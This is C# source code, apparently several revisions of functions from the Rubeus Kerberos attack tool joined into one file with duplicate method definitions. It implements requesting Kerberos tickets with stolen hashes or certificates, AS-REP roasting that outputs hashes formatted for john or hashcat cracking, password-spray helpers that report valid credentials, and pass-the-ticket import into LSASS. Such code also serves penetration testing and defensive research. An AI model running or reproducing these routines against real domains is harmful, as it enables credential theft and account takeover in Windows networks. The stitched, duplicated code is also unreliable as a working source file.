public static byte[] TGT(string userName, string domain, string certFile, string certPass, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool verifyCerts = false, string servicekey = "", bool getCredentials = false)
{
try {
X509Certificate2 cert = FindCertificate(certFile, certPass);
// Check for Base64 encoded certificate second in case certFile was a hex-encoded fingerprint
if (cert == null && Helpers.IsBase64String(certFile))
{
cert = new X509Certificate2(Convert.FromBase64String(certFile), certPass);
}
if (cert == null)
{
Console.WriteLine("[!] Failed to find certificate for {0}", certFile);
return(null);
}
KDCKeyAgreement agreement = new KDCKeyAgreement();
Console.WriteLine("[*] Using PKINIT with etype {0} and subject: {1} ", etype, cert.Subject);
Console.WriteLine("[*] Building AS-REQ (w/ PKINIT preauth) for: '{0}\\{1}'", domain, userName);
AS_REQ pkinitASREQ = AS_REQ.NewASReq(userName, domain, cert, agreement, etype, verifyCerts);
return(InnerTGT(pkinitASREQ, etype, outfile, ptt, domainController, luid, describe, true, false, servicekey, getCredentials));
} catch (KerberosErrorException ex) {
KRB_ERROR error = ex.krbError;
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
} catch (RubeusException ex) {
Console.WriteLine("\r\n" + ex.Message + "\r\n");
}
return(null);
}
public static byte[] TGT(string userName, string domain, string certFile, string certPass, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false)
{
try {
X509Certificate2 cert = FindCertificate(certFile, certPass);
if (cert == null)
{
Console.WriteLine("[!] Failed to find certificate for {0}", certFile);
return(null);
}
KDCKeyAgreement agreement = new KDCKeyAgreement();
Console.WriteLine("[*] Using PKINIT with etype {0} and subject: {1} ", etype, cert.Subject);
Console.WriteLine("[*] Building AS-REQ (w/ PKINIT preauth) for: '{0}\\{1}'", domain, userName);
AS_REQ pkinitASREQ = AS_REQ.NewASReq(userName, domain, cert, agreement, etype);
return(InnerTGT(pkinitASREQ, etype, outfile, ptt, domainController, luid, describe, true));
} catch (KerberosErrorException ex) {
KRB_ERROR error = ex.krbError;
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
} catch (RubeusException ex) {
Console.WriteLine("\r\n" + ex.Message + "\r\n");
}
return(null);
}
public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool opsec = false, string servicekey = "", bool changepw = false)
{
// send request without Pre-Auth to emulate genuine traffic
bool preauth = false;
if (opsec)
{
preauth = NoPreAuthTGT(userName, domain, keyString, etype, domainController, outfile, ptt, luid, describe, true);
}
try
{
// if AS-REQ without pre-auth worked don't bother sending AS-REQ with pre-auth
if (!preauth)
{
Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString);
Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName);
AS_REQ userHashASREQ = AS_REQ.NewASReq(userName, domain, keyString, etype, opsec, changepw);
return(InnerTGT(userHashASREQ, etype, outfile, ptt, domainController, luid, describe, true, opsec, servicekey));
}
}
catch (KerberosErrorException ex)
{
KRB_ERROR error = ex.krbError;
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
}
catch (RubeusException ex)
{
Console.WriteLine("\r\n" + ex.Message + "\r\n");
}
return(null);
}
public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "")
{
// roast AS-REPs for users without pre-authentication enabled
Console.WriteLine("[*] Action: AS-REP Roasting");
string dcIP = Networking.GetDCIP(domainController);
if (string.IsNullOrEmpty(dcIP))
{
return;
}
Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName);
byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac);
byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
if (null == response)
{
return;
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response, false);
// check the response value
int responseTag = responseAsn.TagValue;
switch (responseTag)
{
case 11:
Console.WriteLine("[+] AS-REQ w/o preauth successful!");
// parse the response to an AS-REP
AS_REP rep = new AS_REP(response);
// output the hash of the encrypted KERB-CRED in a crackable hash form
string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty);
repHash = repHash.Insert(32, "$");
string hashString = (format == "john")
? string.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash)
// eventual hashcat format
: string.Format("$krb5asrep${0}$*{1}${2}*${3}${4}",
(int)Interop.KERB_ETYPE.rc4_hmac, userName, domain, repHash.Substring(0, 32), repHash.Substring(32));
Console.WriteLine("[*] AS-REP hash:\r\n");
// display the base64 of a hash, columns of 80 chararacters
foreach (string line in Helpers.Split(hashString, 80))
{
Console.WriteLine(" {0}", line);
}
return;
case 30:
Helpers.DisplayKerberosError(responseAsn);
return;
default:
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
return;
}
}
private void GetUsernamePasswordTGT(string username, string password)
{
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
string salt = String.Format("{0}{1}", domain.ToUpper(), username);
string hash = Crypto.KerberosPasswordHash(encType, password, salt);
AS_REQ unpwAsReq = AS_REQ.NewASReq(username, domain, hash, encType);
byte[] TGT = Ask.InnerTGT(unpwAsReq, encType, null, false, this.dc);
this.ReportValidPassword(username, password, TGT);
}
private void GetUsernamePasswordTGT(string username, string hash, string password, Interop.KERB_ETYPE encType)
{
AS_REQ unpwAsReq = AS_REQ.NewASReq(username, domain, hash, encType);
byte[] TGT = Ask.InnerTGT(unpwAsReq, encType, null, false, this.dc);
if (!string.IsNullOrEmpty(password))
{
this.ReportValidPassword(username, password, TGT);
}
else
{
this.ReportValidPassword(username, hash, TGT);
}
}
private void GetUsernamePasswordTGT(string username, string password)
{
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
string salt = String.Format("{0}{1}", domain.ToUpper(), username.ToLower());
// special case for computer account salts
if (username.EndsWith("$"))
{
salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), username.TrimEnd('$').ToLower(), domain.ToLower());
}
string hash = Crypto.KerberosPasswordHash(encType, password, salt);
AS_REQ unpwAsReq = AS_REQ.NewASReq(username, domain, hash, encType);
byte[] TGT = Ask.InnerTGT(unpwAsReq, encType, null, false, this.dc);
this.ReportValidPassword(username, password, TGT);
}
public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false)
{
try
{
Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString);
Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName);
AS_REQ userHashASREQ = AS_REQ.NewASReq(userName, domain, keyString, etype);
return(InnerTGT(userHashASREQ, etype, outfile, ptt, domainController, luid, describe, true));
}
catch (KerberosErrorException ex)
{
KRB_ERROR error = ex.krbError;
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
}
catch (RubeusException ex)
{
Console.WriteLine("\r\n" + ex.Message + "\r\n");
}
return(null);
}
public static bool NoPreAuthTGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string domainController, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false)
{
string dcIP = Networking.GetDCIP(domainController, true, domain);
if (String.IsNullOrEmpty(dcIP))
{
return(false);
}
AS_REQ NoPreAuthASREQ = AS_REQ.NewASReq(userName, domain, etype, true);
byte[] reqBytes = NoPreAuthASREQ.Encode().Encode();
byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
if (response == null)
{
return(false);
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response, false);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP)
{
Console.WriteLine("[-] AS-REQ w/o preauth successful! {0} has pre-authentication disabled!", userName);
byte[] kirbiBytes = HandleASREP(responseAsn, etype, keyString, outfile, ptt, luid, describe, verbose);
return(true);
}
return(false);
}
public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "", string outFile = "")
{
// roast AS-REPs for users without pre-authentication enabled
string dcIP = Networking.GetDCIP(domainController, true, domain);
if (String.IsNullOrEmpty(dcIP))
{
return;
}
Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName);
byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac).Encode().Encode();
byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
if (response == null)
{
return;
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response, false);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP)
{
Console.WriteLine("[+] AS-REQ w/o preauth successful!");
// parse the response to an AS-REP
AS_REP rep = new AS_REP(response);
// output the hash of the encrypted KERB-CRED in a crackable hash form
string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty);
repHash = repHash.Insert(32, "$");
string hashString = "";
if (format == "john")
{
hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash);
}
else if (format == "hashcat")
{
hashString = String.Format("$krb5asrep$23${0}@{1}:{2}", userName, domain, repHash);
}
else
{
Console.WriteLine("Please provide a cracking format.");
}
if (!String.IsNullOrEmpty(outFile))
{
string outFilePath = Path.GetFullPath(outFile);
try
{
File.AppendAllText(outFilePath, hashString + Environment.NewLine);
}
catch (Exception e)
{
Console.WriteLine("Exception: {0}", e.Message);
}
Console.WriteLine("[*] Hash written to {0}\r\n", outFilePath);
}
else
{
Console.WriteLine("[*] AS-REP hash:\r\n");
// display the base64 of a hash, columns of 80 chararacters
if (Rubeus.Program.wrapTickets)
{
foreach (string line in Helpers.Split(hashString, 80))
{
Console.WriteLine(" {0}", line);
}
}
else
{
Console.WriteLine(" {0}", hashString);
}
Console.WriteLine();
}
}
else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
}
else
{
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
}
}
public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool ptt, string domainController = "", uint luid = 0)
{
Console.WriteLine("[*] Action: Ask TGT\r\n");
Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString);
if (luid != 0)
{
Console.WriteLine("[*] Target LUID : {0}", luid);
}
string dcIP = Networking.GetDCIP(domainController);
if (String.IsNullOrEmpty(dcIP))
{
return(null);
}
Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName);
byte[] reqBytes = AS_REQ.NewASReq(userName, domain, keyString, etype);
byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
if (response == null)
{
return(null);
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response, false);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == 11)
{
Console.WriteLine("[+] TGT request successful!");
// parse the response to an AS-REP
AS_REP rep = new AS_REP(responseAsn);
// convert the key string to bytes
byte[] key = Helpers.StringToByteArray(keyString);
// decrypt the enc_part containing the session key/etc.
// TODO: error checking on the decryption "failing"...
byte[] outBytes;
if (etype == Interop.KERB_ETYPE.rc4_hmac)
{
// KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
{
// KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else
{
Console.WriteLine("\r\n[X] Encryption type \"{0}\" not currently supported", etype);
return(null);
}
AsnElt ae = AsnElt.Decode(outBytes, false);
EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);
// now build the final KRB-CRED structure
KRB_CRED cred = new KRB_CRED();
// add the ticket
cred.tickets.Add(rep.ticket);
// build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
KrbCredInfo info = new KrbCredInfo();
// [0] add in the session key
info.key.keytype = encRepPart.key.keytype;
info.key.keyvalue = encRepPart.key.keyvalue;
// [1] prealm (domain)
info.prealm = encRepPart.realm;
// [2] pname (user)
info.pname.name_type = rep.cname.name_type;
info.pname.name_string = rep.cname.name_string;
// [3] flags
info.flags = encRepPart.flags;
// [4] authtime (not required)
// [5] starttime
info.starttime = encRepPart.starttime;
// [6] endtime
info.endtime = encRepPart.endtime;
// [7] renew-till
info.renew_till = encRepPart.renew_till;
// [8] srealm
info.srealm = encRepPart.realm;
// [9] sname
info.sname.name_type = encRepPart.sname.name_type;
info.sname.name_string = encRepPart.sname.name_string;
// add the ticket_info into the cred object
cred.enc_part.ticket_info.Add(info);
byte[] kirbiBytes = cred.Encode().Encode();
string kirbiString = Convert.ToBase64String(kirbiBytes);
Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);
// display the .kirbi base64, columns of 80 chararacters
foreach (string line in Helpers.Split(kirbiString, 80))
{
Console.WriteLine(" {0}", line);
}
if (ptt || (luid != 0))
{
// pass-the-ticket -> import into LSASS
LSA.ImportTicket(kirbiBytes, luid);
}
return(kirbiBytes);
}
else if (responseTag == 30)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
return(null);
}
else
{
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
return(null);
}
}
public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "")
{
// roast AS-REPs for users without pre-authentication enabled
Console.WriteLine("[*] Action: AS-REP Roasting");
// grab the default DC if none was supplied
if (String.IsNullOrEmpty(domainController))
{
domainController = Networking.GetDCName();
if (String.IsNullOrEmpty(domainController))
{
Console.WriteLine("[X] Error retrieving the current domain controller.");
return;
}
}
System.Net.IPAddress[] dcIP = null;
try
{
dcIP = System.Net.Dns.GetHostAddresses(domainController);
}
catch (Exception e) {
Console.WriteLine("[X] Error retrieving IP for domain controller \"{0}\" : {1}", domainController, e.Message);
return;
}
Console.WriteLine("\r\n[*] Using domain controller: {0} ({1})", domainController, dcIP[0]);
Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName);
byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac);
byte[] response = Networking.SendBytes(dcIP[0].ToString(), 88, reqBytes);
if (response == null)
{
return;
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response, false);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == 11)
{
Console.WriteLine("[+] AS-REQ w/o preauth successful!");
// parse the response to an AS-REP
AS_REP rep = new AS_REP(response);
// output the hash of the encrypted KERB-CRED in a crackable hash form
string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty);
repHash = repHash.Insert(32, "$");
string hashString = "";
if (format == "john")
{
hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash);
}
else
{
// eventual hashcat format
hashString = String.Format("$krb5asrep${0}$*{1}${2}*${3}${4}", (int)Interop.KERB_ETYPE.rc4_hmac, userName, domain, repHash.Substring(0, 32), repHash.Substring(32));
}
Console.WriteLine("[*] AS-REP hash:\r\n");
// display the base64 of a hash, columns of 80 chararacters
foreach (string line in Helpers.Split(hashString, 80))
{
Console.WriteLine(" {0}", line);
}
}
else if (responseTag == 30)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
}
else
{
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
}
}
public static bool NoPreAuthTGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string domainController, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false, string proxyUrl = null)
{
byte[] response = null;
AS_REQ NoPreAuthASREQ = AS_REQ.NewASReq(userName, domain, etype, true);
byte[] reqBytes = NoPreAuthASREQ.Encode().Encode();
if (String.IsNullOrEmpty(proxyUrl))
{
string dcIP = Networking.GetDCIP(domainController, true, domain);
if (String.IsNullOrEmpty(dcIP))
{
return(false);
}
response = Networking.SendBytes(dcIP, 88, reqBytes);
}
else
{
KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(reqBytes);
message.target_domain = NoPreAuthASREQ.req_body.realm;
response = Networking.MakeProxyRequest(proxyUrl, message);
}
if (response == null)
{
return(false);
}
// decode the supplied bytes to an AsnElt object
AsnElt responseAsn = AsnElt.Decode(response);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP)
{
Console.WriteLine("[-] AS-REQ w/o preauth successful! {0} has pre-authentication disabled!", userName);
byte[] kirbiBytes = HandleASREP(responseAsn, etype, keyString, outfile, ptt, luid, describe, verbose);
return(true);
}
else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
if (error.error_code == (int)Interop.KERBEROS_ERROR.KDC_ERR_PREAUTH_REQUIRED)
{
Console.WriteLine("[!] Pre-Authentication required!");
foreach (PA_DATA pa_data in (List <PA_DATA>)error.e_data)
{
if (pa_data.type is Interop.PADATA_TYPE.ETYPE_INFO2)
{
if (((ETYPE_INFO2_ENTRY)pa_data.value).etype == (int)Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
{
Console.WriteLine("[!]\tAES256 Salt: {0}", ((ETYPE_INFO2_ENTRY)pa_data.value).salt);
}
}
}
}
}
return(false);
}
